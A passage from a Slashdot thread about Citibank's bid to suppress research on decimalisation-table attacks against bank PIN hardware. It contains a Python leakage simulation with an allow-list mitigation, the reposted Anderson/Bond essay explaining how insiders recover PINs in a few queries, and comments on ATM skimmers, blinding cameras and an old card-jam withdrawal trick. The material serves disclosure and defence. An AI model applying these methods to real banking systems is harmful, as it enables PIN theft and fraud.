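    Returns (bits, candidates consistent with 'yes', candidates consistent with 'no')."""
    yes, no = [], []
    for c in candidates:
        (yes if verify(c, table, offset, trial_pin) else no).append(c)
    p = len(yes) / len(candidates)
    if p in (0.0, 1.0):  # answer is predetermined, so nothing is learnt
        return 0.0, yes, no
    return -(p * log2(p) + (1 - p) * log2(1 - p)), yes, no


def guarded_verify(ciphertext, table, offset, trial_pin, allowed_tables):
    """Mitigation discussed above: accept only the tables the bank actually
    provisions (an allow-list). Rejecting a few obviously bad tables such as
    1111...11 is not enough, since near-standard tables still leak.
    `allowed_tables` is an assumed configuration value, not a real HSM API."""
    if table not in allowed_tables:
        raise PermissionError("decimalisation table is not on the allow-list")
    return verify(ciphertext, table, offset, trial_pin)


if __name__ == "__main__":
    print("customer PIN:", customer_pin(EXAMPLE_CIPHERTEXT, STANDARD_TABLE, EXAMPLE_OFFSET))
    prefixes = all_hex_prefixes()
    ordinary, _, _ = query_leakage_bits(prefixes, STANDARD_TABLE, "0000", "0000")
    hostile, _, _ = query_leakage_bits(prefixes, "0" + "1" * 15, "0000", "1111")
    print("standard table, one trial PIN: %.4f bits" % ordinary)
    print("0111...11 table, trial PIN 1111: %.4f bits" % hostile)
```

A single guess against the standard table leaks about 0.003 bits, while the page's 0111...11 query leaks about 0.77 bits, which is why the text argues for measuring leakage per transaction rather than trusting the caller's inputs.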

  42. Can't you just change your PIN? by TheSync · · Score: 0, Flamebait

    Won't changing your PIN from the initial one the bank assigns you avoid this problem?

    1. Re:Can't you just change your PIN? by Flakeloaf · · Score: 1

      Nope. Having actually read the article in question I can assure you that won't help.

      --

      Am I the only one who heard Roxette to sing "I'm gonna get blitzed for some sex"?

    2. Re:Can't you just change your PIN? by Anonymous Coward · · Score: 0

      No, you didn't read the article. To quote the article:

      "Unskewed randomly generated PINS stored encrypted in an online database such as are already used in some banks are significantly more secure."

      If you read the article, you would see that the PIN number generation had a dependency on the account number. This means that the PINs are not random. Letting customers choose their own PINs makes the PINs essentially random, which is significantly more secure, and would not fall prey to the tactics that they describe.

    3. Re:Can't you just change your PIN? by Flakeloaf · · Score: 1

      You mean I can't rely on the sanctimonious "I read the article so what you said makes you sound like an idiot" argument unless I actually *read* the article?! But there are.... lotsa pages there! I don't know all those big words!

      --

      Am I the only one who heard Roxette to sing "I'm gonna get blitzed for some sex"?

    4. Re:Can't you just change your PIN? by Anonymous Coward · · Score: 0

      In layman's terms: nope, because the PIN number is stored as an offset value on the magnetic strip. The original PIN, or assigned PIN, is a property of the first four digits of the card number. The original PIN + the offset is the number you enter into the register.

  43. Re:in case of /. by PhxBlue · · Score: 1

    The hell? This isn't informative--without any sort of formatting, it's painful!

    --
    !#@%*)anks for hanging up the phone, dear.
  44. Candid Camera by scottennis · · Score: 4, Funny

    Don't most ATMs have cameras now that take your picture when you do a transaction?

    When these "phantom transactions" occur, I assume there is a picture taken of a dark wraith in a hooded cloak.

    But seriously, wouldn't the bank have your picture if you had performed a transaction?

    1. Re:Candid Camera by nochops · · Score: 2, Interesting

      Yes they do, and that's how I got out of a bad charge on my account.

      I went to the ATM and tried to make a withdrawal. The machine tried to give me the cash, but something went wrong mechanically, and the money never came out.

      I disputed the charge, but since their systems said that I did make the withdrawal, they didn't want to give me my money back.

      I told them I wanted to see the surveillance tape for my personal records. Well, they didn't let me see the tape, but I'm assuming they looked at it and saw that no money came out of the machine. A few days later, I had a credit for the withdrawal.

      --
      "A terrorist is someone who has a bomb but doesn't have an air force." -William Blum
    2. Re:Candid Camera by way2trivial · · Score: 1

      Got 5$?
      http://store.2600.com/spring1995.html
      articles include
      Facts On ATM Camera Security
      basically, with a strong enough IR emitter, you can completely obfuscate the camera..

      --
      every day http://en.wikipedia.org/wiki/Special:Random
    3. Re:Candid Camera by TheLink · · Score: 1

      Actually they know how much money the machine holds, and it's logged how much money the machine spits out.

      The prob is if someone else gets the exact extra amount that you were short of :).

      --
  45. Am I missing something? by asscroft · · Score: 3, Interesting

    How the hell do you use a pin, if you don't have the card. I'm pretty sure the ATM doesn't let me type in my card number.

    Sure I could make a card, if I had the right equipment and had the card for long enough to make it, but in that case I could just as easily use the card.

    I guess if I were super clever and I owned a business that used ATMs at the POS I could rig a line sniffer or something to save the ATM card info, then make some cards, then do this hack 15 times until I got the pin #, then I could steal 300.00 a day.

    but if I owned a business why would I need to steal money?

    Is there some easier way to use the pin #???

    --
    because I have been enjoined by this Holy Office to abandon the false opinion which maintains that the Sun is the centre
    1. Re:Am I missing something? by HughsOnFirst · · Score: 2, Interesting

      A while back there was a case where some bad guys made up a fake ATM machine along the lines of the ones you see in convenience stores. It would simply record the mag stripe on the card and capture the keystrokes, then display an error message about communication lines being down. They planted it in a mall for a week or so and captured thousands of mag stripes and PINs.

      An imaginative person could come up with dozens of similar scenarios.

    2. Re:Am I missing something? by Anonymous Coward · · Score: 0

      i believe they can still use it in a debit card kinda way

    3. Re:Am I missing something? by Old+Wolf · · Score: 1

      The vulnerability requires that you have access to the bank's server and can submit arbitrary function calls to it.

      To hack by saving the messages -- assuming that you can intercept and you have a way to generate your own messages, not a trivial assumption -- but then you will still take the 5,000 odd guesses to get the PIN right because you do not have access to specify a decimalisation table, as is required for this attack

    4. Re:Am I missing something? by jjon · · Score: 4, Informative

      Parent is plain wrong. Read the paper describing the attack (PDF). (Link courtesy of The Register.)

      Sure I could make a card, if I had the right equipment

      Making a card is trivial - blank magstripe cards and encoders are legally and cheaply available.

      and had the card for long enough to make it,

      To clone a card you just need the account number, that's all that's encoded on the magstripe.

      but in that case I could just as easily use the card.

      No, because you wouldn't know the PIN.

      I guess if I were super clever and I owned a business that used ATM's at the POS I could rig a line sniffer or something to save the ATM card info, then make some cards, then do this hack 15 times until I got the pin #

      No, if the customer enters their PIN into your dodgy ATM then you just record the account number and PIN - you don't need to hack anything.

      This attack can only be done by someone inside the bank with access to the PIN checking machine. These machines are meant to be protected against insider attack, but this attack gets around it. The number of guesses required is so small (~30 - if the machines were secure it should be ~5000 for a 4-digit PIN) they might not even be detected by the bank's auditing (assuming that the PIN checker has a suitable audit trail at all).

      then I could steal 300.00 a day

      For about one (or maybe two) days, before the bank or cardholder noticed and cancelled the card. For this to work, you need lots of PINs and just use each account once. The paper claims 20,000+ dollars per day (presumably this is based on how long it physically takes to use the ATM with several cards then move to another one before the cops arrive), and claims 2 million dollars total given a half-hour lunchbreak spent cracking PINs.

      but if I owned a business why would I need to steal money?

      Some people can never have enough money.

    5. Re:Am I missing something? by Twylite · · Score: 1
      For about one (or maybe two) days, before the bank or cardholder noticed and cancelled the card.

      To start with you're right: the attack described by the Cambridge paper requires access to a PIN verification device; ... but the attack the parent comment described was recently and successfully used in Australia.

      An ATM maintenance company is suspected of sniffing magstripes and PINs and according to reports I've heard managed to remain in operation for several months (possibly longer) before being caught, by moving the equipment between ATMs on a very regular basis. The best news reference I could find on this in a short time was here.

      --
      i-name =twylite [http://public.xdi.org/=twylite], see idcommons.net
  46. POTS by Anonymous Coward · · Score: 0

    What's POTS? The best I can come up with is "Piece of The Shit"

    1. Re:POTS by Lxy · · Score: 1

      Plain Old Telephone System.

      Yes, POTS is a POS.

      --

      There is no reasonable defense against an idiot with an agenda
      :wq
  47. What really happened.. by Metallic+Matty · · Score: 2, Funny

    Citibank Tries to Hush ATM Crypto Vulnerability..

    The problem was discovered in the syste-
    *sounds of struggle*
    Where are you throwing meeeeee...

    1. Re:What really happened.. by LoadStar · · Score: 2, Funny

      We apologise for the fault in the last post. Those responsible have been sacked.

    2. Re:What really happened.. by Anonymous Coward · · Score: 0

      I trust they will not be needing their... final salary?

  48. They don't need to in many cases. by rnicey · · Score: 1

    What goes across the line is mostly a hash of the pin and some data stored on the card. That's why ATM transactions can only typically occur with card present. I believe this vulnerability is based on a weak hash algorithm or something in that region that allows you to derive the original pin much quicker than the 5000 or so guesses normally required.

    Therefore you'd also need to steal the physical card and make a dupe, so I'm not sure of the potential loss here. Other places where pins are asked for such as online banking may be vulnerable however.

    I'm probably missing something here, but I'm fairly sure from the Visa transaction specs I've got sitting here you need data from the card and the pin to initiate a transaction. Could be wrong :)

    1. Re:They don't need to in many cases. by KernelHappy · · Score: 3, Informative

      The parent post is mostly correct except that there are a few satellite based ATMs. IIRC military credit union(s) use them for ATMs deployed on large warships or remote bases. But most ATMs are leased line and/or terminated to a frame relay cloud somewhere. ATMs utilizing POTS are a more recent development (mid 90's) and are generally reserved for low traffic volume locations such as convenience stores and boobie bars. But the advent of the ATM surcharge has vaulted the number of POTS based ATMs to new heights. What goes across the line is considerably more than a hash of the pin and some data stored on the card. There is information such as the type of transaction, the terminal ID of the machine it's coming from, transaction sequence number, etc. A copy of the data stored on the mag stripe is also usually sent in the transaction request. This additional information is necessary for reconciliation of funds as well as tracking customer problems.

      Unfortunately a large portion of the security in the debit processing industry is by obscurity, minimizing theft incident values and by keeping the system sealed. In order to exploit these networks a user on the inside is usually necessary and the process of exploitation will leave that person's "fingerprints" all over the theft. Without a person on the inside the actual amounts a person could steal are rather small (thank the thieves the next time you need $500 from your ATM card and your bank only allows you to withdraw $400 a day).

      The biggest problem is that the debit industry relies on legacy systems. Trying to retrofit the authorization process to use newer technologies is both difficult and extremely expensive and would require industry wide cooperation.

      --
      -- Button up, your ignorance is showing
    2. Re:They don't need to in many cases. by Zendar · · Score: 1
      Therefore you'd also need to steal the physical card and make a dupe, so I'm not sure of the potential loss here. Other places where pins are asked for such as online banking may be vunerable however.

      What was that movie where the kids figured out how to get the debit card pins from a distance (using some sort of listening device) and then made phoney cards to withdraw from people's accounts?

    3. Re:They don't need to in many cases. by Old+Wolf · · Score: 1

      The vulnerability applies to programmers who have direct access to the database where the PINs are stored. It tells how they can be clever in supplying parameters to the PIN verification API to deduce the correct PIN quickly.

    4. Re:They don't need to in many cases. by Thu+Anon+Coward · · Score: 1

      what's even worse is that some of the ATMs are now run on a TCP/IP network. consider that thought for a few seconds and then say "ooohhhh shiiiitt !!!!!"

      --
      I'm good with numbers - .45, 7.62, 9.....
  49. Was on kuro5hin earlier... by Skim123 · · Score: 1

    perhaps that's where you saw it.

    --

    I could not justify my existence if I were a turkey farmer. Would I terminate myself? Undoubtably, yes.

  50. Liability, Phantoms, and Security. by nweaver · · Score: 4, Informative

    One major difference between the US and UK is the liability on phantom and fraudulent transactions. In the US, the bank has to prove you performed the transaction. In the UK, you have to prove that you did NOT perform the transaction.

    This difference in liability results in vastly different response to vulnerabilities. In the US, a vulnerability like this is taken very seriously, and phantom transactions are tracked down as they cost the bank money. In the UK, since it is the customer left holding the bag, the banks just don't care until they are sued, and, when sued, will deny deny deny.

    This is a classic example of Citibank trying to cover up a problem, because it allows the customer, in court, to prove that the problem is Citibank's.

    --
    Test your net with Netalyzr
    1. Re:Liability, Phantoms, and Security. by fermion · · Score: 1
      The level of proof a bank needs to win is not all that great. In my one experience, the bank went through an interrogation script with a member of family until that member said something that would open up the possibility that the bank was not liable. It was explained that this possibility meant the bank was not responsible.

      Yes, if the case was taken to court the money could be retrieved, but most of time such action is not justified.

      The actual significance of the alleged security problem is that it opens up expensive and potentially lucrative litigation, which brings in the lawyers and class action lawsuits, which can actually change the alleged irresponsible behaviour. Citibank wants this problem hidden so the lawyers can't use it, and they will not have to change expensive equipment.

      --
      "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
  51. Sucker by Anonymous Coward · · Score: 0

    I hope it happens to you again in 6 months. I hope that you make the same decision, and gradually get nickle and dimed into subsidizing Wells Fargo enough so that they can cut fees to people like me.

  52. Judd vs. Citibank by SirWhoopass · · Score: 4, Informative
    This is the best that I could find:

    http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/liability.pdf


    From the linked PDF:

    The US is totally different; there, in the landmark court case Judd v Citibank [JC], Dorothy Judd claimed that she had not made a number of ATM withdrawals which Citibank had debited to her account; Citibank claimed that she must have done. The judge ruled that Citibank was wrong in law to claim that its systems were infallible, as this placed `an unmeetable burden of proof' on the plaintiff. Since then, if a US bank customer disputes an electronic debit, the bank must refund the money within 30 days, unless it can prove that the claim is an attempted fraud.

    Basically, it says that the bank has the burden of proof in the United States, because the court decided it was unreasonable to have the customer "prove" a flaw within the bank's systems. The UK, however, is different. The customer has the burden of proof.

  53. I just had a thought. . . by Rojo^ · · Score: 2, Funny
    The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure."
    What the fuck are there video cameras embedded in ATMs for? When do they turn on? Have my efforts to moon the bank people been completely in vain?
    --
    <:
    1. Re:I just had a thought. . . by namespan · · Score: 1

      What the fuck are there video cameras embedded in ATMs for? When do they turn on? Have my efforts to moon the bank people been completely in vain?

      I just had a thought, too: reality television! A show made up from ATM video cameras!

      --
      Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
    2. Re:I just had a thought. . . by jafiwam · · Score: 1

      They are always on. There must be a loop of tape or RAM or something. They used ATM cameras in the Sniper case in the US recently, as well as several of the "Forensic Evidence" TV shows on Discovery Channel. At the time there was no transaction taking place yet the recording was done.

      More than likely your buttcheeks got taped over when nothing significant happened. You'd have to moon the camera and then report a crime for anybody to see it.

      This reminds me that my old room-mate used to write "blowjobs" or "dildos" on the memo line of all his checks. The bank eventually wrote a letter asking him to stop, as it caused too much laughter and disruption at the processing area.

  54. many have 2 by Unknown+Poltroon · · Score: 1

    one right there to take your picture of the transaction, and one farther away, so they can see you when you cover it with a post it.

    --
    All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
  55. New ad campaign! by Tackhead · · Score: 1
    > If Citibank sez that their systems are secure. Tell 'em to prove it.

    I sense a new ad campaign in the offing.

    You are not your per-card withdrawal limit.
    You know things more important than your PIN.
    You are worth more than your bank balance.

    Live richly.
    Citi.
  56. welcome my son.... by Anonymous Coward · · Score: 0

    to the machine

  57. Article got /.ed. Text of the article below: by JRHelgeson · · Score: 5, Informative
    Protocol Analysis, Composability and Computation

    Updated 20 February 2003

    18 February 2003

    To: ukcrypto@chiark.greenend.org.uk
    Subject: Citibank tries to gag crypto bug disclosure
    Date: Thu, 20 Feb 2003 09:57:34 +0000
    From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

    Citibank is trying to get an order in the High Court today gagging public disclosure of crypto vulnerabilities:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf

    I have written to the judge opposing the order:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf

    The background is that my student Mike Bond has discovered some really horrendous vulnerabilities in the cryptographic equipment commonly used to protect the PINs used to identify customers to cash machines:

    http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf

    These vulnerabilities mean that bank insiders can almost trivially find out the PINs of any or all customers. The discoveries happened while Mike and I were working as expert witnesses on a `phantom withdrawal' case.

    The vulnerabilities are also scientifically interesting:

    http://cryptome.org/pacc.htm

    For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys. Our courts and regulators should make the banks fix their systems, rather than just lying about security and dumping the costs on the customers.

    Curiously enough, Citi was also the bank in the case that set US law on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's an omen, if not a precedent ...

    _____
    Abstract

    We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30-50 thousand of this each day. This attack thus presents a serious threat to bank security.

    -- Mike Bond and Piotr Zielinski

    Decimalisation table attacks for PIN cracking

    February 2003

    -----

    From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
    To: ukcrypto@chiark.greenend.org.uk
    Subject: Yet another failure of commercial cryptographic equipment
    Date: Tue, 18 Feb 2003 17:52:13 +0000

    I gave a talk at Cambridge yesterday in which I described a new and interesting family of attacks on cryptographic equipment. These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

    The paper is available online at:

    http://research.microsoft.com/~aherbert/volume63.pdf [4.8MB] (link appears to be broken)

    as pages 27-30 in the PDF. [HTML below]

    I got a fax yesterday informing me that an application is to be brought in the High Court, it seems by Citibank, on Thursday 20th February for `relief in relation to the protection of information which they accept as being confidential and which ought not to be in the public domain.'

    I hope that no English court would go so far as to censor already published material. However, one just can't tell these days ...

    Protocol Analysis, Composability and Computation

    Ross Anderson, Michael Bond
    University of Cambridge, England

    Security protocols: early days

    The study of security protocols has been associated with Roger Needham since 1978, when he published the seminal paper on the subject with Mike Schroeder [1]. The problem they investigated was how to distribute cryptographic keys in a network of computers. One solution is to have an authentication service with which all the principals share a key; then if Alice wants to chat with Bob (for example) she can call the service and get two encrypted messages containing the same session key: one encrypted under the key she shares with the service so she can read it, and one encrypted under the key Bob shares with the service so Bob can read it. She can now send the second of these to Bob to establish secure communication. The mechanism that Needham and Schroeder designed for this evolved into Kerberos, which is now part of Windows and is probably the most widely used of all authentication protocols.

    Security protocols are now embedded in a great many applications, but it is common to find unexpected bugs in them. For example, many banks used to encrypt each customer's PIN using a key known to their ATMs and write it on the ATM card magnetic strip. The idea was to provide a limited service when the network was down. Years later, a villain discovered that the account number and the encrypted PIN were not linked: he could make up a bank card with his own encrypted PIN but someone else's account number, and loot their account. He went on to steal a lot of money, and once in prison wrote a manual telling everyone else how to do it too. The banks had to spend millions on changing their systems.

    Clarifying the assumptions

    Researchers started to gnaw away at the protocols described in the literature and found fault with essentially all of them. The failure to bind protocol elements was one frequent problem; another was that old messages could be replayed. In the case of the original Needham-Schroeder protocol, for example, the freshness of the key generated by the server was guaranteed to only one of the principals. This was not necessarily an attack, as its inventors only claimed to protect honest insiders from dishonest outsiders. However, it led to a debate about the assumptions underlying security protocol design. Do we protect only against outsiders, or against insiders? Against the malicious, or the merely careless? For example, if we use timestamps to guarantee protocol freshness, are we vulnerable to principals who carelessly let their clocks run slow? Do we only consider an attacker to have won if he can impersonate an authorised principal, or do we need to stop people abusing the protocol mechanisms to perform a service denial attack?

    The early attacks led to a second seminal paper, which Roger wrote with Mike Burrows and Martin Abadi in 1989 [2], and which introduced a logic of authentication. This enables an analyst to formalise the assumptions and goals of a security protocol, and to attempt to prove its correctness. When a proof cannot be found, the place at which one gets stuck often shows where an attack can be mounted. This style of analysis turned out to be very powerful, and a large literature quickly developed in which the BAN Logic and other formal tools were developed and extended to tackle a range of problems in protocol design.

    One of the remarkable things about the study of security protocols is that they have not become a solved problem. One might think that managing the objects associated with authenticating users over a network (passwords, keys and the like) was a fairly compact problem which would have been done to death within a few years. However, the more we dig, the more we find.

    Since 1992, Roger has hosted a protocols workshop every Easter. Early events dwelled on matters of authentication and logic, but by the mid-90s, the growing interest in electronic commerce was yielding papers on mechanisms for micropayments, bets, streaming media, mobile communications and electronic voting. Later years brought work on PKI, trust management and copyright enforcement. More and more problems come along as more and more businesses reinvent themselves online; threat models have also become more realistic, with dishonest insiders displacing the mythical evil hacker on the Internet.

    Dishonest insiders, and the composition problem

    Over the last two years, we have been exploring exactly how one might re-engineer cryptography to cope with dishonest insiders. One conclusion is that the analysis of security protocols must be extended to application programming interfaces. This is because the crypto keys used in authentication and payment protocols are often kept in separate hardware security processors, or at least in cryptographic libraries, to which access can be restricted using physical or logical mechanisms. However, an interface has to be exposed to the application program, which will occasionally be suborned, whether by a corrupt insider or by malware. How much harm can be done, and how can we limit it?

    Protecting protocols was hard enough, and yet the typical protocol consists of 3-5 messages exposed to manipulation. The API of a modern crypto library or hardware cryptoprocessor may contain 30-500 callable functions, many with a range of options. This provides a very rich and complex environment for mischief.

    Attacks often involve using two separate mechanisms provided by the cryptoprocessor for different purposes, each of which could be innocuous by itself but which combine to cause trouble. For example, it is common to compute a customer PIN by encrypting the account number with a PIN derivation key: the cryptoprocessor then returns the PIN encrypted with a PIN storage key, so that the application has no access to its clear value. So far, so good. Then there is another transaction that can be used to encrypt a communications key under the terminal key loaded in an ATM. Here things start to go wrong, as the cryptoprocessor does not distinguish between a terminal key and a PIN derivation key; it considers them both to be of the same type. The upshot is that an attacker can supply the device with an account number, claiming that it is a communications key, and ask for it to be encrypted under the PIN derivation key.

    Attacks like this extend protocol analysis all the way to the composition problem: the problem that connecting two systems that are secure in isolation can give a composite system that leaks. This had previously been seen as a separate issue, tackled with different conceptual tools.

    Differential protocol analysis

    We are now working on the second generation of API attacks, which exploit the application syntax supported by the cryptographic service. These attacks are even more powerful, and at least as interesting from the scientific point of view. PIN generation provides a neat example here too. In more detail, the standard PIN computation involves writing the result of the encryption as a hex string and decimalising it. As some banks like to let customers change their PIN to a more memorable number, there is a provision to add an offset to give the PIN that the customer actually enters:

    Account number:            8807 0123 4569 1715
    PIN derivation key:        FEFE FEFE FEFE FEFE
    Encrypted account number:  A2CE 126C 69AE C82D
    Natural (decimalised) PIN: 0224
    Offset:                    6565
    Customer PIN:              6789

    The typical implementation requires the programmer to send the cryptoprocessor the account number, a table describing the decimalisation (here, 0123 4567 8901 2345) and the offset. The processor returns the PIN, encrypted under the PIN storage key. The designers do not seem to have realised that a crooked programmer can manipulate the decimalisation table and the offset as well as the account number. A multitude of attacks follow. For example, one can send in an account number with a decimalisation table of 1111...11 to find out the ciphertext corresponding to a clear PIN of 1111, and then with a decimalisation table of 0111...11 to see if there is a zero in the first four digits of the encrypted account number (if so, the PIN, and thus the ciphertext output, will be different). By manipulating the decimalisation table further, he can get all the digits in the PIN, and by then playing with the offset he can get their order. In total, the attack requires only 15-25 unprivileged cryptoprocessor transactions to discover the PIN on a single target account.

    This second type of attack takes protocol analysis into yet another realm: that of differential attacks. Over the last ten years, a number of techniques have been invented for attacking cryptographic systems by bombarding them with inputs with chosen differences.

    For example, in differential cryptanalysis, one analyses the changes in the output of the encryption algorithm; while with differential power analysis, one measures changes in the current consumption or electromagnetic emissions of the equipment. Now we have examples of how consecutive runs of a protocol can leak information if the inputs are suitably chosen. The resulting differential protocol analysis appears to be very powerful against application-level crypto.

    It will take us some time to figure out the general lessons to be drawn from attacks like this, the robustness principles that designers should use to avoid them, and the analysis techniques that might assure us of a particular design's soundness. The randomisation of all protocols (another feature of Roger's work) is likely to be important.

    Quantitative analysis and multiparty computation

    Various researchers have speculated about whether there might one day be a quantitative analysis of protocol security. This might be feasible for PIN processing applications as we can measure the information leakage per transaction in terms of the reduction of entropy in the unknown PIN. This leads in turn to a possible real-world application of an attack previously considered theoretical.

    Gus Simmons wrote extensively on covert channels in protocols. One such channel that is always present is the balking channel, when one of the principals in a protocol signals something by halting and refusing to continue. This is normally considered unimportant as its information capacity is only a third of a bit per transaction. But with systems designed to cope with large transaction volumes, this need no longer hold. For example, a Trojanned cryptoprocessor could balk when it sees a predetermined PIN. If the PIN length were eight digits, this would be unlikely to hinder normal operation, but at a thousand transactions a second, a programmer could quickly find a number in a typical nine-digit account number range with just this PIN, and open an account for it. Once this kind of problem is appreciated, one can start to look for attacks that involve inducing rare error conditions that cause the cryptoprocessor to abort a transaction. (They exist.)

    A third emerging link is between protocol analysis and secure multiparty computation. In application-level crypto we may have several inputs to a computation, some of them coming from an untrusted source, and we have to stop users manipulating the computation to get outputs useful for bad purposes. In the PIN decimalisation example above, one might try to solve the problem by blocking tables such as 1111...11. Yet an attacker can get by with scarcely more work by using two normal-looking tables that differ slightly (another kind of differential attack). We might therefore think that if we can't sanitize the inputs to the computation, perhaps we can authenticate them, and use only those tables that real banks actually use. But building every bank in the world into our trust base is what we were trying to avoid by using cryptography!

    Conclusion

    The protocol work that started off a quarter of a century ago may have seemed at the time like a minor detail within the larger project of designing robust distributed systems. Yet it has already grown into the main unifying theme of security engineering. Application-level protocols, and especially those from which an attacker can harvest data over many runs, open up new problems. The resulting analysis techniques are set to invade the world of composable security, and the world of multiparty computation. The influence, and the consequences, of Roger's contribution just keep on growing.

    References

    1. NEEDHAM, R.M. AND SCHROEDER, M.D., Using encryption for authentication in large networks of computers. Comm. ACM, vol. 21, no. 12, pp. 993-999, 1978.

    2. BURROWS, M., ABADI, M. AND NEEDHAM, R.M., A logic of authentication. ACM Transactions on Computer Systems, vol. 8, no. 1, pp. 18-36, 1990.

    --
    Good security is based upon reality and common sense. Common sense is a function of having common knowledge.
  58. In other news by Anonymous Coward · · Score: 0

    Lunatics rally in Washington to allow nuclear launch codes posted on slashdot.org.

    1. Re:In other news by Anonymous Coward · · Score: 0

      Where do I sign up? I'm launching mine at the French, I'll do Saddam next.

  59. This makes me laugh by Anonymous Coward · · Score: 0

    I'm doing a late night coding session, and reading slashdot at the same time.

    My project? A Windows 2000 based ATM machine.

    If only your people *really* knew the truth... :o)

  60. Re:ATM? (pic)! by $$$$$exyGal · · Score: 4, Informative
    --
    Very popular slashdot journal for adul
  61. No, they wont. by Unknown+Poltroon · · Score: 1

    Why would they fix it, when they already KNOW there's a problem, and yet they refuse to admit it to the customers who have lost money??!?! If they were quietly REIMBURSING the customers, then I would agree. But they aren't.

    --
    All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
  62. Too late.. by xchino · · Score: 1

    I just downloaded the pdf. I'm sure thousands of others have as well. If they manage to get a BS gag order, I'll happily send my archived copy to a web server outside the US.

    It's a ridiculous scam, and if it works, that simply reflects the propensity of lack of true patriotism among those in charge.

    --
    Everyone is entitled to their own opinion. It's just that yours is stupid.
    1. Re:Too late.. by harryk · · Score: 1

      Which PDF did you download? I got 2 of the 4 (I think); could you send me the one you have? harryk

      --
      think before you write, it'll save me moderator points.
    2. Re:Too late.. by Anonymous Coward · · Score: 0

      Put it up on a server outside the U.S. *before* the gag order is issued. That way, you cannot be touched for ignoring the order.

  63. Re:Wouldn't have happened.... by Anonymous Coward · · Score: 0

    This, to me, actually means no one cares about OS/2 enough to hack it. There isn't an OS that can't be busted. There are creative/genius people out there.

    The absence of an action does not make such action impossible. To think otherwise is very ego-maniacal.

  64. Re:My Days in the Show by Anonymous Coward · · Score: 0
    "air rage" is so pre-9/11.

    SUBMIT is what's cool now.

  65. The interesting question . . . by Badgerman · · Score: 1

    Now that this information has been posted here and on various news sites, will this pressure Citibank to fix their problem - or open up new lawsuits and claims that such postings helped/caused crimes . . .

    In an age of Information Technology, the medium, the message, and the misuse can be the same thing.

    --
    "The Sage treasures Unity and measures all things by it" - Lao Tzu
  66. Re:ATM? (pic)! by Dr+Caleb · · Score: 1
    Good one! The server is running Windows too.

    The page cannot be displayed
    There are too many people accessing the Web site at this time.

    Please try the following:

    * Click the Refresh button, or try again later.
    * Open the www.maximum-digital.com home page, and then look for links to the information you want.

    HTTP 403.9 - Access Forbidden: Too many users are connected

    Internet Information Services

    --
    "History doesn't repeat itself, but it does rhyme." Mark Twain
  67. Re:in case of /. by Anonymous Coward · · Score: 0

    Yeah, we all know how that story ends: three crappy sequels, each one desecrating a little bit more what little of that was good in our youth, where it turns out that Trollvader is the hero!

  68. An old vulnerability by frovingslosh · · Score: 4, Interesting
    This seems the right time and place to relate a story about a 30 year old ATM bug I heard about:

    A student at my old school noticed once that the ATM machine had a problem and so voided the transaction he was making. He also noted that the ATM gave him his money before it gave the ATM card back.

    He went up to an ATM one evening and slipped in his card. Pushed all the right buttons to take out his daily limit. Took the cash. The ATM asked if he wanted to do anything else, he said no. As the ATM was about to eject his card, he put his hand in front of the slot. The ATM displayed that there was a jam. It voided the transaction and displayed that it was unavailable. He removed his hand and was able to grab the card by its edge and pull it out. The ATM sensed the jam was cleared and displayed it was ready for business.

    The procedure was repeated. and repeated. and repeated. Eventually the ATM was empty.

    The next day he went into the bank, put down a pile of cash and explained to the manager that they had a problem.

    --
    I'm an American. I love this country and the freedoms that we used to have.
    1. Re:An old vulnerability by blair1q · · Score: 4, Funny

      When does he get out of prison?

    2. Re:An old vulnerability by pod · · Score: 1

      I seriously doubt it would have worked even back then. The bank usually knows exactly how much money is in the machine, so when it's refilled or audited the discrepancy would show up and transaction records would be pulled.

      Sure you get the money, but then you screw up your life for a measly few grand. It's not worth it if you just wanna scam some retirement money.

      --
      "Hot lesbian witches! It's fucking genius!"
    3. Re:An old vulnerability by Zog+The+Undeniable · · Score: 1

      Every ATM I've ever used makes you take your card BEFORE the cash. I smell an urban myth ;-)

      --
      When I am king, you will be first against the wall.
    4. Re:An old vulnerability by Spirilis · · Score: 1

      umm, every one I've ever been to that TAKES your card (as opposed to swiping it across a reader) asks you if you want to do another transaction, before releasing your card... giving you the cash before it asks. Then again, that kind of vulnerability may not work, since the cash withdrawal transaction had finished...

      --
      the real at&t mix
    5. Re:An old vulnerability by frovingslosh · · Score: 1
      I made it pretty clear that this was from the 70's. Once it was discovered, there was a national shutdown of the ATMs affected and a very hasty rework of the software. Yes, I observed that change after the event. Just because you don't see the problem now is hardly a reason to call it an urban myth.

      And for the other post that such a scam would mess up your entire life, banks are pretty easy about accepting your money and letting you open an account, even more so back then. I've been asked for ID to get money from a bank, but never to give them money. It would have not been hard back then, before there were cameras in all of the ATMs and other precautions, to open an account, get an ATM card sent to a Post Office Box, and empty a town full of ATMs in one night, with little left behind to be found from. They are damn lucky the guy who figured it out was not so inclined.

      --
      I'm an American. I love this country and the freedoms that we used to have.
    6. Re:An old vulnerability by Zog+The+Undeniable · · Score: 1
      AFAIK the prime reason the card is returned before the cash is to stop people walking away and forgetting their card (it's amazing how the brain shuts down at the feel of hard currency). I don't have any stats on me, but "time outs" are one of the main reasons for captured cards.

